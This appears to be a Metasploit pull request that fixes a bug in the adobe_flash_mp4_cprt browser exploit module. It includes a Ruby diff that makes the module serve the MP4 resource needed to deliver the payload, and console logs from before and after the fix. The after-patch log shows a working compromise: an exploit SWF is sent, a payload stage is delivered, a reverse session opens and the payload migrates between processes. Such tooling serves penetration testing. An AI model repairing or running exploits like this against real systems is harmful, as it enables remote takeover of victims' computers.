### PR TITLE
Fix add_resource call in adobe_flash_mp4_cprt (RM#7108)

### DIFF
--- a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb
+++ b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb
@@ -176,12 +176,11 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		#
 		# "/test.mp4" is currently hard-coded in the swf file, so we need to add to resource
-		#
+		#	
 		proc = Proc.new do |cli, req|
+			self.add_resource({'Path' => "/test.mp4", 'Proc' => proc}) rescue nil
 			on_request_uri(cli, req)
 		end
-
-		self.add_resource({'Path'=>'/test.mp4', 'Proc'=>proc})# rescue nil
 
 	end
 


### PR DESCRIPTION
Fixes an issue preventing get_resource from being called in adobe_flash_mp4_cprt. With this error in place, successful exploitation is impossible as the static page/resource required to deliver the payload is not set up.

Relates to Redmine bug #7108:
http://dev.metasploit.com/redmine/issues/7108

The idea was to ensure the resource is setup before any call to the on_request_uri function was able to take place and then resolve any errors silently if the module attempted to create the resource again, as those errors can be safely ignored in this instance.

Testing consisted of attempting to exploit a known vulnerable system while using wireshark to observe 404 errors for the missing resource. Once succesfull, I additionally attempted multiple connect/exploits from differing machines to make sure the resource remained open and multiple machines could be exploited and handled.

**Before Patch:**
msf > use exploit/windows/browser/adobe_flash_mp4_cprt 
msf exploit(adobe_flash_mp4_cprt) > set URIPATH /test
URIPATH => /test
msf exploit(adobe_flash_mp4_cprt) > exploit
[_] Exploit running as background job.
msf exploit(adobe_flash_mp4_cprt) > 
[_] Started reverse handler on 192.168.1.135:4444 
[_] Using URL: http://0.0.0.0:8080/test
[_]  Local IP: http://192.168.1.135:8080/test
[_] Server started.
[_] 192.168.1.135    adobe_flash_mp4_cprt - Client requesting: /test
[_] 192.168.1.135    adobe_flash_mp4_cprt - Sending html
[_] 192.168.1.135    adobe_flash_mp4_cprt - Client requesting: /test/hfn.swf
[_] 192.168.1.135    adobe_flash_mp4_cprt - Sending Exploit SWF
[_] 192.168.1.135    adobe_flash_mp4_cprt - Client requesting: /test.mp4
[*] 192.168.1.135    adobe_flash_mp4_cprt - Sending MP4...

**404 return on /test.mp4 in network captures**

**After Patch:**
msf > use exploit/windows/browser/adobe_flash_mp4_cprt 
msf exploit(adobe_flash_mp4_cprt) > set URIPATH /test
URIPATH => /test
msf exploit(adobe_flash_mp4_cprt) > exploit
[_] Exploit running as background job.
msf exploit(adobe_flash_mp4_cprt) > 
[_] Started reverse handler on 192.168.1.135:4444 
[_] Using URL: http://0.0.0.0:8080/test
[_]  Local IP: http://192.168.1.135:8080/test
[_] Server started.
[_] 192.168.1.135    adobe_flash_mp4_cprt - Client requesting: /test
[_] 192.168.1.135    adobe_flash_mp4_cprt - Sending html
[_] 192.168.1.135    adobe_flash_mp4_cprt - Client requesting: /test/iDoGj.swf
[_] 192.168.1.135    adobe_flash_mp4_cprt - Sending Exploit SWF
[_] 192.168.1.135    adobe_flash_mp4_cprt - Client requesting: /test.mp4
[_] 192.168.1.135    adobe_flash_mp4_cprt - Sending MP4...
[_] Sending stage (752128 bytes) to 192.168.1.135
[_] Session ID 1 (192.168.1.135:4444 -> 192.168.1.135:55952) processing InitialAutoRunScript 'migrate -f'
[_] Current server process: iexplore.exe (2608)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2968
[+] Successfully migrated to process 
